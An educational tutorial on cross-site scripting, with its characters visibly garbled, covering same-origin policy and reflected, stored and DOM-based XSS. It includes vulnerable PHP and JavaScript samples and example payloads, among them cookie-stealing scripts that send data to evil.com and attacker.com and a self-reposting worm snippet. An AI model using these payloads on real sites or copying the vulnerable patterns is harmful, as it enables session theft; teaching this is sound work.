๐ TABLE OF CONTENTS
1. ๐ง Understanding XSS
2. ๐ Same Origin Policy & XSS Relationship
3. ๐ญ XSS Types Deep Dive
Reflected XSS Stored XSS DOM-Based XSS Blind XSS
4. ๐ฏ XSS Contexts & Exploitation
5. ๐ ๏ธ Advanced Exploitation Techniques
6. ๐ฅ Attack Impact & Real-World Cases
7. ๐ Finding XSS Vulnerabilities
8. ๐ฌ Testing Methodology
9. ๐ก๏ธ Prevention & Mitigation
๐ง 1. UNDERSTANDING CROSS-SITE SCRIPTING (XSS)
๐ฏ What is XSS ?
XSS is a security bug where a website allows an attacker to run their own JavaScript code in another user's browser.
๐ก The Core Concept
๐ KEY UNDERSTANDING:
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โ XSS is NOT about attacking across different sites! โ
โ It's about injecting and executing JavaScript โ
โ WITHIN the SAME trusted site/origin โ
โ โ
โ Think: "Content Injection" not "Cross-Site" โ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
๐ฏ THE BROWSER'S PERSPECTIVE:
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โ ๐ If code comes FROM example.com โ
โ โ Browser TRUSTS it completely โ
โ โ Full access to: โ
โ โโโ ๐ช Cookies & Session tokens โ
โ โโโ ๐พ LocalStorage & SessionStorage โ
โ โโโ ๐๏ธ DOM (entire page structure) โ
โ โโโ ๐ค User's personal data โ
โ โโโ ๐ก Can make requests as user โ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ ๏ธ Why "Cross-Site Scripting" is a Misleading Name
โ COMMON MISCONCEPTION:
"Attacker's script runs on attacker's site
and attacks victim's site"
โ
REALITY:
"Attacker injects malicious script INTO victim's site
Script executes AS IF it belongs to victim's site
Browser treats it as legitimate site code"
โจ BETTER NAME WOULD BE:
โข "Same-Origin Script Injection"
โข "Malicious Content Injection"๐ 2. SAME ORIGIN POLICY (SOP) & XSS RELATIONSHIP
๐ฏ What is Same Origin Policy ?
Same Origin Policy is a browser security rule that prevents a website's JavaScript from accessing data of another website unless both have the same origin.
๐ Origin Components
Origin = Scheme + Domain + Port
๐ EXAMPLES:
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โ URL: https://example.com:443/page โ
โ โ
โ ๐น Scheme: https โ
โ ๐น Domain: example.com โ
โ ๐น Port: 443 (default for HTTPS) โ
โ โ
โ ๐ฏ Origin: https://example.com:443 โ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โ
SAME ORIGIN EXAMPLES:
โข https://example.com/page1
โข https://example.com/page2
โข https://example.com/admin/panel
โ DIFFERENT ORIGIN EXAMPLES:
โข http://example.com (different scheme)
โข https://sub.example.com (different domain)
โข https://example.com:8080 (different port)๐ก๏ธ SOP Rules & Restrictions
๐ WHAT SOP BLOCKS:
โโโ ๐ Reading content from different origin
โโโ ๐ช Accessing cookies from different domain
โโโ ๐พ Reading localStorage from different origin
โโโ ๐ Making authenticated requests cross-origin
โโโ ๐ Reading response data cross-origin
๐ WHAT SOP ALLOWS:
โโโ ๐ผ๏ธ Loading images: <img src="other-origin">
โโโ ๐ Loading scripts: <script src="other-origin">
โโโ ๐จ Loading styles: <link href="other-origin">
โโโ ๐ฌ Loading videos: <video src="other-origin">
โโโ ๐ค Sending POST requests (but can't read response)
โโโ ๐ Form submissions to different origins๐ฏ How XSS Bypasses Same Origin Policy
๐ THE XSS BYPASS MECHANISM:
๐ก๏ธ NORMAL SCENARIO (SOP Protected):
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โ attacker.com's script โ
โ โ Tries to read โ
โ victim.com's cookies โ
โ โ BLOCKED by Same Origin Policy โ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
๐ฅ XSS SCENARIO (SOP BYPASSED):
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โ 1๏ธโฃ Attacker injects malicious code โ
โ INTO victim.com โ
โ โ
โ 2๏ธโฃ Malicious code is served FROM โ
โ victim.com (trusted origin) โ
โ โ
โ 3๏ธโฃ Browser sees: "This is victim.com's โ
โ own code" โ FULL TRUST โ
โ โ
โ 4๏ธโฃ Script has complete access: โ
โ โ
Read cookies โ
โ โ
Access localStorage โ
โ โ
Modify DOM โ
โ โ
Make authenticated requests โ
โ โ
Read sensitive data โ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
๐ฏ KEY POINT:
XSS doesn't "bypass" SOP technically
It works WITHIN the target origin!๐ Visual: SOP vs XSS
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โ SAME ORIGIN POLICY โ
โ โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโฃ
โ โ
โ attacker.com victim.com โ
โ โโโโโโโโโโโโ โโโโโโโโโโโโ โ
โ โ ๐ซ Scriptโโโโโโโโโโโโโโ ๐ Data โ โ
โ โ trying โ BLOCKED โ ๐ชCookiesโ โ
โ โ to read โ โ ๐พStorageโ โ
โ โโโโโโโโโโโโ โโโโโโโโโโโโ โ
โ โ
โ โ
SOP Working - Attack Prevented โ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โ XSS - SOP CIRCUMVENTION โ
โ โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโฃ
โ โ
โ attacker.com โ
โ โโโโโโโโโโโโ โ
โ โ ๐ ๏ธ Craftsโ โ
โ โ ๐ฃPayloadโ โ
โ โโโโโโโฌโโโโโ โ
โ โ Injects into โ
โ โ โ
โ victim.com โ
โ โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ โ
โ โ ๐ฆ Malicious Script โ โ
โ โ โโโโโโโโโโโโโโโโโโโโโโ โ โ
โ โ โ<script> โ โ โ
โ โ โsteal_cookies() โโโโโโโผโโโโ "This is MY code" โ
โ โ โ</script> โ โ Says browser โ
โ โ โโโโโโโโโโโโโโโโโโโโโโ โ โ
โ โ โ โ โ
โ โ โโโโโโโโโโโโโโโโ โ โ
โ โ โโ
Full Access โ โ โ
โ โ โ to All โ โ โ
โ โ โ Resources โ โ โ
โ โ โโโโโโโโโโโโโโโโ โ โ
โ โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ โ
โ โ
โ โ Attack Successful - XSS Bypassed SOP โ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ๐ญ 3. XSS TYPES โ DEEP DIVE
๐ XSS Classification Matrix
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โ XSS VULNERABILITY TYPES โ
โ โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโฃ
โ โ
โ ๐ BY DATA FLOW: โ
โ โโโ Server-Side XSS โ
โ โ โโโ ๐ Reflected XSS (Non-Persistent) โ
โ โ โโโ ๐พ Stored XSS (Persistent) โ
โ โโโ Client-Side XSS โ
โ โโโ ๐๏ธ DOM-Based XSS โ
โ โ
โ ๐ฏ BY EXECUTION CONTEXT: โ
โ โโโ ๐ HTML Context โ
โ โโโ ๐ค Attribute Context โ
โ โโโ ๐ JavaScript Context โ
โ โโโ ๐ URL Context โ
โ โโโ ๐จ CSS Context โ
โ โ
โ ๐ฌ BY DETECTION METHOD: โ
โ โโโ ๐๏ธ Regular XSS (Visible response) โ
โ โโโ ๐ Blind XSS (Invisible to attacker) โ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ1๏ธโฃ ๐ REFLECTED XSS (NON-PERSISTENT)
๐ Definition -
Reflected Cross-Site Scripting happens when a website takes user input from a request (like a URL or form) and shows it back in the response without proper security checks, allowing malicious scripts to run instantly.
๐ How It Works
๐ฏ ATTACK FLOW DIAGRAM:
๐ค Attacker ๐ฅ Victim ๐ฅ๏ธ Server
โ โ โ
โ 1๏ธโฃ Crafts malicious URL โ โ
โ with payload โ โ
โ โ โ
โ 2๏ธโฃ Sends link via: โ โ
โ โข ๐ง Email phishing โ โ
โ โข ๐ฑ Social media โ โ
โ โข ๐ฏ Malicious ads โ โ
โ โ โ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโบโ โ
โ โ โ
โ โ 3๏ธโฃ Clicks malicious link โ
โ โ โ
โ โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโบโ
โ โ GET /search?q= โ
โ โ <script>evil()</script> โ
โ โ โ 4๏ธโฃ Server reflects input
| | | in response
โ โ โ
โ โ โ
โ โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโค
โ โ <p>You searched for: โ
โ โ <script>evil()</script></p> โ
โ โ โ
โ โ 5๏ธโฃ Browser executes โ
โ โ malicious script โ
โ โ โ
โ 6๏ธโฃ Receives stolen data โ โ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโ โ โ
โ (cookies, session) โ โ๐ Real-World Example from PortSwigger
A website's search function receives the user-supplied search term in a URL parameter, and if the application doesn't perform proper processing, an attacker can construct an attack by injecting script tags.
Vulnerable Code -
<!-- โ ๏ธ VULNERABLE SEARCH PAGE -->
<?php
// search.php
$searchTerm = $_GET['search'];
?>
<!DOCTYPE html>
<html>
<head>
<title>Search Results</title>
</head>
<body>
<h1>Search Results</h1>
<p>You searched for: <?php echo $searchTerm; ?></p>
<!-- โ ๏ธ VULNERABILITY: Direct output without encoding -->
</body>
</html>Normal Request -
๐ URL: https://example.com/search.php?search=laptop
๐ฅ Response:
<p>You searched for: laptop</p>
โ
Result: Works as expectedMalicious Request -
๐ URL: https://example.com/search.php?search=<script>alert(document.cookie)</script>
๐ฅ Response:
<p>You searched for: <script>alert(document.cookie)</script></p>
๐ฅ Result:
โข JavaScript executes!
โข Cookie theft possible
โข Session hijacking risk๐ฏ Common Injection Points
1๏ธโฃ SEARCH PARAMETERS:
/search?q=<payload>
/products?search=<payload>
/users?name=<payload>
2๏ธโฃ ERROR MESSAGES:
/login?error=<payload>
/404?page=<payload>
/message?text=<payload>
3๏ธโฃ INPUT REFLECTION:
/welcome?name=<payload>
/profile?user=<payload>
/comment?text=<payload>
4๏ธโฃ REDIRECT PARAMETERS:
/redirect?url=javascript:alert(1)
/goto?next=<payload>
5๏ธโฃ TRACKING PARAMETERS:
/page?ref=<payload>
/article?from=<payload>
6๏ธโฃ FILTER PARAMETERS:
/list?filter=<payload>
/results?category=<payload>๐ค Attack Delivery Methods
1๏ธโฃ ๐ง EMAIL PHISHING:
Subject: "Your Account Has Been Locked!"
Body: "Click here to verify:
http://bank.com/login?error=<script>...</script>"
2๏ธโฃ ๐ฌ SOCIAL ENGINEERING:
"Check out this funny video!"
โ bit.ly/xyz โ vulnerable site with payload
3๏ธโฃ ๐ฑ SMS PHISHING (SMISHING):
"Your package is ready:
http://shipping.com/track?id=<script>...</script>"
4๏ธโฃ ๐ฎ IN-GAME MESSAGES:
Chat message with malicious link
5๏ธโฃ ๐ฐ FORUM/BLOG COMMENTS:
Post contains shortened URL with payload
6๏ธโฃ ๐บ MALICIOUS ADVERTISEMENTS:
Ad banner with XSS link
7๏ธโฃ ๐ท QR CODES:
QR code โ vulnerable URL with payload๐ Characteristics
โ
Non-persistent (temporary)
โ
Requires victim interaction (click link)
โ
Payload in URL/request parameters
โ
Immediate reflection in HTTP response
โ
One-time execution per victim
โ
Server-side vulnerability
โ Does not affect all users
โ Lower impact than Stored XSSโ ๏ธ Severity Assessment
๐ REFLECTED XSS IMPACT:
โโโ ๐ Depends on:
โ โโโ Application sensitivity
โ โโโ User privileges
โ โโโ Session token exposure
โ โโโ Data accessibility
โ
โโโ ๐ข LOW RISK SCENARIOS:
โ โโโ Public information sites
โ โโโ No authentication required
โ โโโ No sensitive data
โ
โโโ ๐ก MEDIUM RISK SCENARIOS:
โ โโโ Authenticated applications
โ โโโ User profile access
โ โโโ Limited sensitive data
โ
โโโ ๐ด HIGH RISK SCENARIOS:
โโโ ๐ฆ Banking/financial sites
โโโ โ๏ธ Admin panels
โโโ ๐ฅ Healthcare applications
โโโ ๐๏ธ Government portals2๏ธโฃ ๐พ STORED XSS (PERSISTENT XSS)
๐ Definition -
Stored Cross-Site Scripting is a vulnerability in which malicious script code is permanently stored by an application and executed automatically in users' browsers whenever the affected content is accessed.
๐ Why It's Called "Second-Order" XSS
๐ก "SECOND-ORDER" EXPLANATION:
๐ FIRST ORDER (Reflected XSS):
Request โ Server โ Response โ Execute
โโโโโโโโโโโโโโโโโโโโโโโโโโ
(Single interaction)
๐ SECOND ORDER (Stored XSS):
Request โ Server โ Database โ [Time Passes] โ
Retrieve โ Response โ Execute
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
(Two separate interactions)
The payload is:
1๏ธโฃ Stored first (Order 1)
2๏ธโฃ Retrieved and executed later (Order 2)๐ Complete Attack Flow
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โ STORED XSS ATTACK LIFECYCLE โ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
๐ฏ PHASE 1: INJECTION
โโโโโโโโโโโโโโโโโโโโโ
๐ค Attacker
โ
โ Submits malicious comment/post:
โ <script>fetch('https://evil.com/steal?c='+document.cookie)</script>
โ
๐ฅ๏ธ Web Server
โ
โ No validation/sanitization
โ Stores "as-is"
โ
๐พ Database
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โ comments table โ
โ โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ โ
โ โ user: "attacker" โ โ
โ โ text: "<script>...</script>โ โ
โ โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ โ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
๐ฆ INFECTION COMPLETE
๐ฏ PHASE 2: PROPAGATION (could be hours/days later)
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
๐ฅ Victim #1 ๐ฅ Victim #2 ๐ฅ Victim #3
โ โ โ
โ Views page โ Views page โ Views page
โ โ โ
๐ฅ๏ธ Web Server โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โ
โ Retrieves from database
โ
๐พ Database
โ
โ Returns malicious payload
โ
๐ฅ๏ธ Web Server
โ
โ Embeds in HTML response (no encoding)
โ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โ <div class="comment"> โ
โ <script> โ
โ fetch('https://evil.com/steal?c=' โ
โ + document.cookie); โ
โ </script> โ
โ </div> โ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โ โ โ
๐ฅ Victim #1 ๐ฅ Victim #2 ๐ฅ Victim #3
๐ฅ Infected! ๐ฅ Infected! ๐ฅ Infected!
(Cookies sent) (Cookies sent) (Cookies sent)
๐ฏ PHASE 3: EXPLOITATION
โโโโโโโโโโโโโโโโโโโโโโโ
๐ Attacker's Server (evil.com)
โ
โ Receives stolen data:
โโโ Victim #1: session=abc123...
โโโ Victim #2: session=def456...
โโโ Victim #3: session=ghi789...
โ
โ Attacker uses stolen sessions
โ
๐ฏ COMPLETE ACCOUNT TAKEOVER๐ Real-World Example
<!-- โ ๏ธ VULNERABLE BLOG COMMENT SYSTEM -->
<!-- 1๏ธโฃ Comment Submission (comment_submit.php) -->
<?php
// โ ๏ธ VULNERABILITY: No input validation
$comment = $_POST['comment'];
$username = $_POST['username'];
// Store in database
$query = "INSERT INTO comments (username, text, post_id)
VALUES ('$username', '$comment', $post_id)";
mysqli_query($db, $query);
header('Location: post.php?id=' . $post_id);
?>
<!-- 2๏ธโฃ Comment Display (post.php) -->
<?php
// Retrieve comments from database
$query = "SELECT username, text FROM comments WHERE post_id = $post_id";
$result = mysqli_query($db, $query);
while ($comment = mysqli_fetch_assoc($result)) {
// โ ๏ธ VULNERABILITY: Direct output without encoding
echo '<div class="comment">';
echo '<strong>' . $comment['username'] . ':</strong><br>';
echo $comment['text']; // ๐ฅR XSS HER!
echo '</div>';
}
?>Attack Scenario -
๐ฏ STEP 1: ATTACKER'S PAYLOAD
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
Form Input:
Username: John Doe
Comment: Great article!
<script>
new Image().src='https://attacker.com/steal.php?c='+document.cookie;
</script>
๐ฏ STEP 2: STORED IN DATABASE
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
Database Entry:
| id | username | text |
|----|-----------|------------------------------------------|
| 42 | John Doe | Great article! <script>...</script> |
๐ฏ STEP 3: EVERY VIEWER GETS INFECTED
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
When ANY user views the post:
<div class="comment">
<strong>John Doe:</strong><br>
Great article!
<script>
new Image().src='https://attacker.com/steal.php?c='+document.cookie;
</script>
</div>
๐ฅ RESULT:
โข Script executes in victim's browser
โข Cookie sent to attacker's server
โข Session hijacked
โข Account compromised๐ฏ Common Stored XSS Locations
๐ด HIGH-RISK STORAGE LOCATIONS:
1๏ธโฃ ๐ฌ COMMENT SYSTEMS:
โโโ Blog comments
โโโ Product reviews
โโโ Forum posts
โโโ Discussion threads
โโโ Article comments
2๏ธโฃ ๐ค USER PROFILES:
โโโ Bio/About section
โโโ Display name
โโโ Status messages
โโโ Profile description
โโโ Signature
โโโ Location/hometown
3๏ธโฃ ๐จ MESSAGING SYSTEMS:
โโโ Private messages
โโโ Chat applications
โโโ Internal messaging
โโโ Support tickets
โโโ Email-like systems
4๏ธโฃ ๐ CONTENT MANAGEMENT:
โโโ Wiki pages
โโโ Documentation
โโโ User-generated articles
โโโ Blog posts
โโโ Product descriptions
5๏ธโฃ ๐ FILE METADATA:
โโโ Filename
โโโ File description
โโโ Author name
โโโ Title
โโโ Tags/categories
6๏ธโฃ ๐ซ FORM SUBMISSIONS:
โโโ Contact forms
โโโ Feedback forms
โโโ Survey responses
โโโ Registration forms
โโโ Application forms
7๏ธโฃ ๐ TAGS & CATEGORIES:
โโโ Hashtags
โโโ Product tags
โโโ Custom categories
โโโ User-defined labels
8๏ธโฃ ๐ LOGGING & ANALYTICS:
โโโ Error logs (displayed to admins)
โโโ Activity logs
โโโ Audit trails
โโโ Report comments
9๏ธโฃ ๐ E-COMMERCE:
โโโ Product names
โโโ Order notes
โโโ Shipping addresses
โโโ Gift messages
โโโ Wishlist names
๐ ๐ฎ GAMING PLATFORMS:
โโโ Player names
โโโ Clan descriptions
โโโ Game chat
โโโ Achievement names
โโโ Custom game modes๐ฆ Stored XSS: The Worm Potential
๐ฆ SELF-PROPAGATING XSS WORM:
๐ฏ BASIC CONCEPT:
1๏ธโฃ Victim views infected content
2๏ธโฃ Malicious script executes
3๏ธโฃ Script posts ITSELF as new content
4๏ธโฃ Next victim views it
5๏ธโฃ Repeat โ Exponential spread!
๐ SIMPLIFIED WORM CODE:
<script>
// The worm payload
var wormCode = '<script src="https://evil.com/worm.js"><\/script>';
// Post payload as new comment
fetch('/api/comment', {
method: 'POST',
headers: {'Content-Type': 'application/json'},
body: JSON.stringify({
text: 'Check this out! ' + wormCode
})
});
</script>
๐ SPREAD TIMELINE:
โฐ Minute 1: Infects 1 user
โฐ Minute 5: 10 users infected
โฐ Minute 15: 100 users infected
โฐ Minute 30: 1,000 users infected
โฐ Hour 1: 10,000+ users infected๐ Famous Example: Samy Worm (MySpace, 2005)
๐ฏ REAL-WORLD WORM ATTACK:
๐ฑ Platform: MySpace (2005)
๐ค Attacker: Samy Kamkar
๐ฅ WHAT IT DID:
โโโ Added "Samy is my hero" to profiles
โโโ Added Samy as friend
โโโ Copied itself to infected profiles
โโโ Spread to their friends
๐
TIMELINE:
โโโ Started: Single profile
โโโ 20 hours later: 1 MILLION profiles infected
โโโ Result: MySpace shutdown temporarily
โก IMPACT:
โ
Proved XSS worms are real threat
โ
Exponential propagation demonstrated
โ
No user interaction needed
โ
Automatic self-replicationโ ๏ธ Why Stored XSS is Most Dangerous
The key difference between reflected and stored XSS is that stored XSS enables attacks that are self-contained within the application itself, with the attacker placing their exploit into the application and simply waiting for users to encounter it.
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โ REFLECTED vs STORED XSS COMPARISON โ
โ โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโฃ
โ โ
โ FEATURE โ REFLECTED XSS โ STORED XSS โ
โ โโโโโโโโโโโโโโโโโโโชโโโโโโโโโโโโโโโโโชโโโโโโโโโโโโโโโโโโโโโโโฃ
โ Persistence โ โ Temporary โ โ
Permanent โ
โ User Action โ โ ๏ธ Click link โ โ
None needed โ
โ Victim Count โ โ ๏ธ 1-100s โ ๐ฅ 1000s-millions โ
โ Attack Duration โ โ ๏ธ One-time โ ๐ฅ Until removed โ
โ Detection โ โ
URL visible โ โ Hidden in DB โ
โ Social Eng. โ โ ๏ธ Required โ โ
Not needed โ
โ Attack Surface โ โ ๏ธ Limited โ ๐ฅ Widespread โ
โ Worm Potential โ โ No โ ๐ฅ Yes โ
โ Remediation โ โ
Easy โ โ ๏ธ Complex โ
โ โโโโโโโโโโโโโโโโโโโชโโโโโโโโโโโโโโโโโชโโโโโโโโโโโโโโโโโโโโโโโฃ
โ DANGER LEVEL โ ๐ก MEDIUM โ ๐ด CRITICAL โ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
๐ IMPACT MULTIPLIER:
Reflected: 1-10 victims typical
Stored: 1,000-1,000,000+ victims possible
โฐ TIME TO DETECTION:
Reflected: Minutes to hours
Stored: Days to months (often discovered by users!)๐ Characteristics
โ
Persistent (permanently stored)
โ
No victim interaction required
โ
Affects ALL users viewing content
โ
Can propagate as worm
โ
Long-term infection
โ
Server-side vulnerability
๐ฅ Hardest to detect and remove
๐ฅ Highest impact of all XSS types
๐ด MOST DANGEROUS XSS VARIANT3๏ธโฃ ๐๏ธ DOM-BASED XSS ( CLIENT-SIDE XSS )
๐ Definition
DOM-Based Cross-Site Scripting is a client-side vulnerability where malicious script code is executed due to unsafe handling of data within the browser's Document Object Model, without direct involvement of the server.
๐ What Makes DOM XSS Different
๐ฏ KEY DIFFERENCE:
๐ TRADITIONAL XSS (Reflected/Stored):
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โ Browser โ Server (sees payload) โ
โ โ Server processes โ
โ โ Server includes in response โ
โ โ Browser receives & executes โ
โ โ
โ โ ๏ธ Payload visible in server logs โ
โ โ ๏ธ Can be detected by WAF/IDS โ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
๐๏ธ DOM-BASED XSS:
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โ Browser โ Server โ
โ โ Server sends CLEAN HTML โ
โ โ Browser receives clean page โ
โ โ JavaScript processes URL โ
โ โ JavaScript manipulates DOM โ
โ โ Malicious code executes โ
โ โ
โ โ
Server NEVER sees payload โ
โ โ
Server logs show nothing โ
โ โ
WAF/IDS completely bypassed โ
โ โ
Entirely client-side attack โ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ๐ Sources and Sinks
๐ Sources (Where attacker-controlled data comes from) -
// ๐ URL-based sources (most common)
location.href // Full URL
location.search // Query string: ?param=value
location.hash // Fragment: #anchor
location.pathname // Path: /page/subpage
// ๐ Document sources
document.URL // Full URL
document.documentURI // Document URI
document.baseURI // Base URI
document.referrer // Referring page
// ๐พ Storage sources
localStorage.getItem('key')
sessionStorage.getItem('key')
// ๐ Other sources
window.name // Window name
document.cookie // Cookies
history.pushState() // History APIโ ๏ธ Sinks (Where data becomes dangerous) -
// ๐๏ธ DOM manipulation sinks (MOST COMMON)
element.innerHTML = source; // ๐ฅ VERY DANGEROUS
element.outerHTML = source; // ๐ฅ DANGEROUS
document.write(source); // ๐ฅ DANGEROUS
document.writeln(source); // ๐ฅ DANGEROUS
// ๐ Script execution sinks
eval(source); // ๐ฅ CRITICAL
setTimeout(source, time); // ๐ฅ DANGEROUS
setInterval(source, time); // ๐ฅ DANGEROUS
Function(source)(); // ๐ฅ DANGEROUS
new Function(source)(); // ๐ฅ DANGEROUS
// ๐ URL sinks
location = source; // ๐ฅ DANGEROUS
location.href = source; // ๐ฅ DANGEROUS
location.assign(source); // ๐ฅ DANGEROUS
location.replace(source); // ๐ฅ DANGEROUS
window.location = source; // ๐ฅ DANGEROUS
window.open(source); // ๐ฅ DANGEROUS
// โก jQuery sinks
$(source); // ๐ฅ DANGEROUS (jQuery selector)
$('div').html(source); // ๐ฅ DANGEROUS
$('div').append(source); // ๐ฅ DANGEROUS
$('div').prepend(source); // ๐ฅ DANGEROUS
// ๐จ HTML5 sinks
element.insertAdjacentHTML(pos, source); // ๐ฅ DANGEROUS
postMessage(source, '*'); // โ ๏ธ Can be dangerous๐ Complete DOM XSS Attack Flow
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โ DOM-BASED XSS ATTACK FLOW โ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
๐ฏ STEP 1: ATTACKER CRAFTS URL
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
๐ URL: https://example.com/page#<img src=x onerror=alert(1)>
โ
Fragment (never sent to server)
๐ฏ STEP 2: VICTIM CLICKS LINK
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
๐ Browser: GET /page HTTP/1.1
Host: example.com
๐ Note: Fragment (#...) is NOT included in HTTP request!
๐ฏ STEP 3: SERVER RESPONSE (Clean!)
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
๐ฅ HTTP/1.1 200 OK
<!DOCTYPE html>
<html>
<body>
<div id="content"></div>
<script src="app.js"></script> โ Contains vulnerable code
</body>
</html>
๐ฅ๏ธ Server has NO IDEA about the payload in URL fragment!
๐ฏ STEP 4: JAVASCRIPT PROCESSES URL
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
// app.js (vulnerable code)
var content = location.hash.substring(1); // Reads fragment
document.getElementById('content').innerHTML = content; // Writes to DOM
๐ฏ STEP 5: DOM UPDATED WITH MALICIOUS CONTENT
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
<div id="content">
<img src=x onerror=alert(1)> โ Injected by JavaScript
</div>
๐ฏ STEP 6: BROWSER EXECUTES
โโโโโโโโโโโโโโโโโโโโโโโโโโโ
๐ผ๏ธ Image fails to load โ onerror event fires โ JavaScript runs!
๐ฅ XSS SUCCESSFUL
๐ฏ KEY POINTS:
โ
Server logs show: GET /page (clean request)
โ
No payload visible in server logs
โ
WAF cannot detect it
โ
IDS cannot block it
โ
Completely client-side attack๐ Real-World Vulnerable Code Patterns
Pattern 1: Classic innerHTML Sink
// โ ๏ธ Vulnerable code
function displayWelcome() {
var name = location.hash.substring(1);
document.getElementById('welcome').innerHTML = 'Hello ' + name;
}
// ๐ Attack URL:
https://site.com/#<img src=x onerror=alert(document.cookie)>
// ๐ฅ Result: Cookie theftPattern 2: document.write() Vulnerability
// โ ๏ธ Vulnerable code
var queryParam = location.search.substring(1);
document.write('<div>Search: ' + queryParam + '</div>');
// ๐ Attack URL:
https://site.com/?</div><script>alert(1)</script>
// ๐ฅ Breaks out of div and executes scriptPattern 3: jQuery Selector Injection
// โ ๏ธ Vulnerable code
var elementId = location.hash;
$(elementId).hide();
// ๐ Attack URL:
https://site.com/#<img src=x onerror=alert(1)>
// ๐ฅ jQuery interprets as HTML, not selector!Pattern 4: eval() with URL Data
// โ ๏ธ Vulnerable code
var callback = new URLSearchParams(location.search).get('callback');
eval(callback + '()');
// ๐ Attack URL:
https://site.com/?callback=alert(1);void
// ๐ฅ Direct JavaScript executionPattern 5: Location Assignment
// โ ๏ธ Vulnerable code
var redirect = location.hash.substring(1);
location.href = redirect;
// ๐ Attack URL:
https://site.com/#javascript:alert(1)
// ๐ฅ JavaScript protocol executesPattern 6: Base64 Encoding (False Security)
// โ ๏ธ Vulnerable code (developers think encoding = security)
var userData = atob(location.hash.substring(1));
document.getElementById('profile').innerHTML = userData;
// ๐ Attack:
// Payload: <img src=x onerror=alert(1)>
// Base64: PGltZyBzcmM9eCBvbmVycm9yPWFsZXJ0KDEpPg==
// URL: https://site.com/#PGltZyBzcmM9eCBvbmVycm9yPWFsZXJ0KDEpPg==
// ๐ฅ Still executes! Encoding โ Security๐ Detection Challenges
โ WHY DOM XSS IS HARD TO FIND:
โ Not in HTTP request/response
โโโ Server logs show nothing
โโโ WAF cannot inspect
โโโ IDS cannot detect
โ Client-side only
โโโ Requires JavaScript analysis
โโโ Dynamic code flows
โโโ Framework-dependent
โ Complex data flows
โโโ Source โ Transform โ Sink
